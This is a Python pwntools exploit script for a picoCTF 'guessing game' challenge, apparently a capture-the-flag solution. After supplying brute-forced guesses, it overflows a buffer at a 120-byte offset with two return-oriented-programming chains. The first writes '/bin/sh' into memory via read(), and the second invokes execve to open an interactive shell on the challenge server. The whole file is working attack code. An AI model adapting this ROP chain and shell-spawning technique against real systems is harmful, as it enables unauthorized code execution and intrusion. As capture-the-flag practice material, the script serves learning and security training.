#!/usr/bin/env python
from pwn import *
# https://cyb3rwhitesnake.medium.com/picoctf-guessing-game-1-pwn-bdc1c87016f9
context.terminal = "kitty"

numbers = [84, 87, 78, 16, 94, 36] # -> brute-forcing script

elf = ELF("./vuln")
rop = ROP(elf)
pop_rdi = rop.rdi.address
pop_rsi = rop.rsi.address
pop_rdx = rop.rdx.address
pop_rax = rop.rax.address
syscall = rop.syscall.address
bss = elf.bss()
read = elf.functions['read'].address
main = elf.functions['main'].address

ret_offset = 120

conn = remote("shape-facility.picoctf.net", 50780)
#conn = process("./vuln")
#attach(conn)

conn.recvuntil(b"guess?")
conn.sendline(str(numbers[0]).encode())
conn.recvuntil(b"Name?")

# call read: read(int fd -> rdi, void buf[count] -> rsi, size_t count -> rdx)
# read(stdin/0, bss, 12)
log.info(f"sending read payload")
payload = cyclic(ret_offset, n=8)
payload += p64(pop_rdi) + p64(0)
payload += p64(pop_rsi) + p64(bss)
payload += p64(pop_rdx) + p64(12)
payload += p64(read)
payload += p64(main)
conn.sendline(payload)
conn.sendline(b"/bin/sh\x00")

conn.recvuntil(b"guess?")
conn.sendline(str(numbers[1]).encode())
conn.recvuntil(b"Name?")

# call /bin/sh: sys_execve(59), rdi: char *filename, rsi: char *argv, rdx: char *envp
# sys_execve(bss, NULL/0, NULL/0)
log.info(f"calling execve")
payload = cyclic(ret_offset, n=8)
payload += p64(pop_rax) + p64(59)
payload += p64(pop_rdi) + p64(bss)
payload += p64(pop_rsi) + p64(0)
payload += p64(pop_rdx) + p64(0)
payload += p64(syscall)
conn.sendline(payload)

conn.recvline()
conn.interactive()